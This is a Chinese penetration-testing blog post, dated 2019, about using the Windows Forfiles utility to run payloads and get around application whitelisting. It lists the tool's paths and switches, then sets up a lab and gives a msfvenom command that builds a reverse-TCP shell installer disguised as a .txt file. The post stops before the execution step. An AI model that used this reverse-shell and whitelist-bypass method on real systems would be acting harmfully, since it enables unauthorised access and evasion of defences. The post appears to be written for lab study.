滲透測試-基于白名單執行payload--Forfiles

0x01 Forfiles簡介：

Forfiles為Windows預設安裝的檔案操作搜尋工具之一，可根據日期，字尾名，修改日期為條件。常與批處理配合使用。

微軟官方文檔：

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)

說明：Forfiles.exe所在路徑已被系統添加PATH環境變量中，是以，Forfiles指令可識别，需注意x86，x64位的Forfiles調用。

Windows 2003 預設位置： 

C:\WINDOWS\system32\forfiles.exe

C:\WINDOWS\SysWOW64\forfiles.exe
           

Windows 7 預設位置： 

C:\WINDOWS\system32\forfiles.exe

C:\WINDOWS\SysWOW64\forfiles.exe
           

0x02 forfils使用

/ P   路徑 用于搜尋檔案的目錄（檔案夾）。預設為目前目錄。 不接受UNC路徑（\\ machine \ share）。

/ M   搜尋掩碼 一個glob模式（通配符搜尋）。僅選擇檔案名與模式比對的檔案。檔案擴充名包含在檔案名中; 不是路徑（檔案夾名稱）。模式必須與整個名稱比對，或使用通配符。預設設定是比對所有檔案。

此選項把glob模式*.*和*不同。前者僅比對名稱中帶有點的檔案，而後者甚至比對沒有點或擴充名的檔案。即使給定*.*模式，大多數DOS / Windows指令也會比對沒有擴充名的檔案。

 

/ S  （沒有） 選擇子目錄中的比對檔案。預設情況下，僅搜尋單個指定目錄。

/C   指令 為每個比對的檔案執行給定的指令。指令字元串通常需要用雙引号括起來。請參閱下面的指令字元串中的文法。預設指令是CMD /C ECHO @FILE，導緻輸出（顯示）每個比對檔案的名稱。

/ d   日期 根據上次修改日期選擇檔案。請參閱下面的日期文法。預設情況下，無論日期如何，都會選擇檔案。

/？   （沒有） 顯示幫助消息（簡要使用說明）。禁止檔案搜尋/指令執行。不得與任何其他開關一起使用。
           

0x03 複現

攻擊機： Kali

靶機： win7

Msf配置:

生成木馬:

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.190.141 LPORT=4444 -f msi > hacker.txt
           

靶機執行:

posted @ 2019-05-02 15:40 卿先生 閱讀(...) 評論(...) 編輯 收藏